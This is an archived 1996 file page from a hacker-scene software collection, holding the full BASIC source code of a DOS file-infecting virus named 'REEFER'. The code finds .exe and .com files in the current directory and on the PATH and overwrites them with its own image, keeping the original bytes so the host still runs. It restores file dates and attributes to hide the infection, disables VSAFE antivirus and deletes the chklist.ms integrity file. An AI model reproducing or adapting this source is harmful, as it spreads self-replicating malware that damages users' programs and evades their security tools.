home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
Collection of Hack-Phreak Scene Programs
/
cleanhpvac.zip
/
cleanhpvac
/
CASIOCOL.ZIP
/
WEEDV10.ZIP
/
WEED.ASI
next >
Wrap
Text File
|
1996-10-09
|
7KB
|
352 lines
dim t1(3275)
dim t2(3275)
a$="WEED - v1.0"
gosub bye_vsafe:
vsafebak=cx
gosub chklist:
yourparm$=command$
yourparm$=ltrim$(yourparm$)
yourparm$=rtrim$(yourparm$)
N = LEN(YOURPARM$)
A$ = CHR$(N)
A$ = A$ + YOURPARM$
B$ = CHR$(13)
A$ = A$ + B$
pass$=a$
x=0
rem REEFER virus version 1.0
rem t1 array holds us, t2 array holds original virus length of host,
rem encrypted until needed for extraction of course :-)
rem This virus has the ability to infect by overwriting and still
rem allow the host to run normally. In fact, the host will have
rem no idea that it has been infected!
rem Variables used:
rem Before we can begin, we need to load an image of ourselves.
rem this saves on drive needs later!
gosub find_my_name:
filename$=programname$
gosub get_fdt:
oldtime=newtime
olddate=newdate
open"i",1,programname$
for x=1 to 3263
input #1,a$ BYTE
a=asc(a$)
t1(x)=a
next x
close 1
virupath$=""
proc$="*.exe"
gosub start_virus:
proc$="*.com"
gosub start_virus:
for n=0 to 100
call sub "path", n, virupath$
i=LEN(virupath$)
if i=0 then done:
b$=right$(virupath$,1)
if b$<>"\" then
virupath$=virupath$+"\"
endif
out1$="*.exe"
out2$="*.com"
proc$=virupath$+out1$
gosub start_virus:
proc$=virupath$+out2$
gosub start_virus:
next n
rem That little code snippit above ensures that we can copy!
rem the next array is to hold our little friend. You'll see :-)
done:
rem Here is where we say Bye :-)
rem and transfer control to our gracious host! :-)
a&=filelen(programname$)
b&=a&-3263&
b&=abs(b&)
gosub get_attr:
fileattr=cx
newattr=0
gosub set_attr:
gosub chklist:
open"r",1,programname$
a&=filepos(1,b&)
for x=1 to 3263
input #1,a$ BYTE
a=asc(a$)
a=a-192
t2(x)=a
next x
a&=filepos(1,0)
for x=1 to 3263
a=t2(x)
a$=chr$(a)
if a$="" then
print #1,a$
else
print #1,a$ NONULL
endif
next x
a&=filepos(1,b&)
print #1,"" NONULL
CLOSE 1
newdate=olddate
newtime=oldtime
gosub set_fdt:
newattr=fileattr
gosub set_attr:
rem now, we need to run our new host :-) we can re-infect it afterwards
rem by making a simple call to 'Lets_infect:' and passing the host
rem filename.
IF pass$="" then
CALL programname$,""
else
call programname$,pass$
endif
gosub bye_vsafe:
fileattr=cx
filename$=programname$
newattr=0
gosub set_attr:
open"i",1,filename$
for x=1 to 3263
input #1,a$ BYTE
a=asc(a$)
a=a+192
t2(x)=a
next x
close 1
gosub chklist:
open"r",1,filename$
for x=1 to 3263
a=t1(x)
a$=chr$(a)
if a$="" then
print #1,a$
else
print #1,a$ NONULL
endif
next x
a=filepos(1,eof)
for x=1 to 3263
a=t2(x)
a$=chr$(a)
if a$="" then
print #1,a$
else
print #1,a$ NONULL
endif
next x
close 1
newtime=oldtime
newdate=olddate
gosub set_fdt:
newattr=fileattr
gosub set_attr:
gosub chklist:
gosub res_vsafe:
end
rem We have completed replication. all stop!
start_virus:
kewl=0
ATTRIB=16
FILENAME$=FIND FIRST (proc$,attrib)
gosub test_infection:
if infected=0 then
gosub lets_infect:
endif
while kewl<4
FILENAME$=FIND CONTINUE
gosub test_infection:
if infected=0 then
gosub lets_infect:
endif
IF ERROR>0 THEN
return
endif
wend
Lets_infect:
gosub get_fdt:
gosub get_attr:
fileattr=cx
newattr=0
gosub set_attr:
open"i",1,filename$
for x=1 to 3263
input #1,a$ BYTE
a=asc(a$)
a=a+192
t2(x)=a
next x
close 1
kill"chklist.ms"
open"r",1,filename$
for x=1 to 3263
a=t1(x)
a$=chr$(a)
if a$="" then
print #1,a$
else
print #1,a$ NONULL
endif
next x
a=filepos(1,eof)
for x=1 to 3263
a=t2(x)
a$=chr$(a)
if a$="" then
print #1,a$
else
print #1,a$ NONULL
endif
next x
close 1
gosub set_fdt:
newattr=fileattr
gosub set_attr:
return
REM ******* SYSTEM SUB-ROUTINES BELOW THIS LINE. DO NOT TREAD HERE!
REM ******* THESE AREAS MUST NOT BE FOOLED WITH!
find_my_name:
AX = &HEX6200
INT86(&HEX21,AX,BX,NA,NA,NA,NA,NA,NA,NA)
PSPSegment = BX
rem Find environment address from PSP
DEFSEG = PSPSegment
a=peek(&hex2d)
b=peek(&hex2c)
EnvSegment = a * 256
EnvSegment = Envsegment + b
rem Find the filename
DEFSEG = EnvSegment
EOT = 1
rem Set end of environment table flag
Offset = 0
WHILE EOT=1
Byte = PEEK(Offset)
rem Get table character
IF Byte = 0 THEN
rem End of environment string?
Offset = Offset + 1
Byte = PEEK(Offset)
IF Byte = 0 THEN
rem End of environment?
Offset = Offset + 3
rem Yes - Skip over nulls & tbl info
C = PEEK(Offset)
WHILE C <> 0
rem Assemble filename string from individual characters
a$=chr$(c)
FileN$ = FileN$ + a$
Offset = Offset + 1
C = PEEK(Offset)
WEND
EOT = 0
rem Set flag to exit while/wend loop
ENDIF
ELSE
rem No-Read more environment string
Offset = Offset + 1
ENDIF
WEND
ProgramName$ = FileN$
DEFSEG=-1
return
get_attr:
AX = &HEX4300
DX = VARPTR(Filename$)
CX = NewAttr
INT86(&HEX21,AX,NA,CX,DX,NA,NA,NA,NA,NA)
return
set_attr:
AX = &HEX4301
DX = VARPTR(Filename$)
CX = NewAttr
INT86(&HEX21,AX,NA,CX,DX,NA,NA,NA,NA,NA)
return
bye_vsafe:
ax=&hexfa02
dx=&hex5945
bx=0
int86(&hex16,ax,bx,cx,dx,na,na,na,na,na)
return
res_vsafe:
ax=&hexfa02
dx=&hex5945
bx=vsafebak
int86(&hex16,ax,bx,cx,dx,na,na,na,na,na)
return
get_fdt:
AX=&HEX3D01
DX=varptr(filename$)
INT86(&HEX21,AX,NA,CX,DX,NA,NA,NA,NA,NA)
FILE_HANDLE=AX
AX=&HEX5700
BX=FILE_HANDLE
INT86(&HEX21,AX,BX,CX,DX,NA,NA,NA,NA,NA)
NEWDATE=CX
NEWTIME=DX
RETURN
set_fdt:
AX=&HEX3D01
DX=varptr(filename$)
INT86(&HEX21,AX,NA,CX,DX,NA,NA,NA,NA,NA)
FILE_HANDLE=AX
AX=&HEX5701
BX=FILE_HANDLE
CX=NEWDATE
DX=NEWTIME
INT86(&HEX21,AX,BX,CX,DX,NA,NA,NA,NA,NA)
RETURN
test_infection:
filename$=virupath$+filename$
var$=""
gosub get_attr:
fileattr=newattr
newattr=0
gosub set_attr:
open"r",1,filename$
r=filepos(1,28)
for x=1 to 4
input #1,a$ BYTE
var$=var$+a$
next x
close 1
newattr=fileattr
gosub set_attr:
if var$="┼▀≥≈" then
infected=1
else
infected=0
endif
return
chklist:
temp1$=filename$
filename$="chklist.ms"
newattr=0
gosub set_attr:
kill filename$
filename$=temp1$
return